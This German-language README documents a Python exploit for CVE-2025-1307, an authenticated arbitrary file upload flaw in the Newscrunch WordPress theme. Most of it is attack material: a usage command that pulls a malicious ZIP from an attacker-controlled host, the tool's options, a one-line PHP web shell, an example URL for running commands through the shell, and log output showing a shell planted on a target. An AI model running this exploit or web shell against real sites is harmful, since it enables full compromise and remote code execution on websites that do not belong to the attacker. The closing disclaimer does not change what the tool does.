
Newscrunch <= 1.8.4 - Authentifiziert (Abonnent+) Beliebiger Datei-Upload
Dieser Exploit zielt auf eine kritische Sicherheitslücke (CVE-2025-1307) im Newscrunch WordPress-Theme ab. Der Fehler ermöglicht authentifizierten Benutzern (Abonnent und höher) das Hochladen beliebiger Dateien aufgrund fehlender Berechtigungsprüfungen in der Funktion newscrunch_install_and_activate_plugin(). Dies kann zu Remote Code Execution (RCE) führen, wodurch die betroffene WordPress-Website vollständig kompromittiert wird.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HAusnutzbarkeit: Erfordert ein gültiges WordPress-Konto mit Abonnentenrechten oder höher.
✅ Automatisierte Ausnutzung von CVE-2025-1307
✅ Automatische Erkennung der verwundbaren Theme-Version
✅ Automatische Extraktion und Ausführung der ZIP-Nutzlast
✅ Dynamisches Abrufen des Shell-Dateinamens aus der ZIP
✅ Automatische Überprüfung der Shell-Verfügbarkeit nach der Ausnutzung
✅ Saubere und strukturierte Protokollierung zur Fehlersuche
Stellen Sie sicher, dass Python 3.x installiert ist, und installieren Sie die erforderlichen Abhängigkeiten:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
Sobald die Shell erfolgreich hochgeladen wurde, ermöglicht sie die Remote-Befehlsausführung auf dem Zielsystem. Die Shell-Datei sollte in einem ZIP-Archiv abgelegt werden und wird bei der Ausnutzung automatisch extrahiert.
Stellen Sie sicher, dass sich Ihre PHP-Shell (shell.php) in einem ZIP-Archiv befindet. Laden Sie dann die ZIP-Datei mit dem Exploit hoch.
<?php system($_GET['cmd']); ?>
Sie können Systembefehle über den Browser ausführen, indem Sie den cmd-Parameter an die Shell-URL anhängen:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
Dieses Tool dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die unbefugte Ausnutzung von Schwachstellen ist illegal und strafbar. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Verwenden Sie es verantwortungsbewusst.
Von: Nxploit | Khaled Alenazi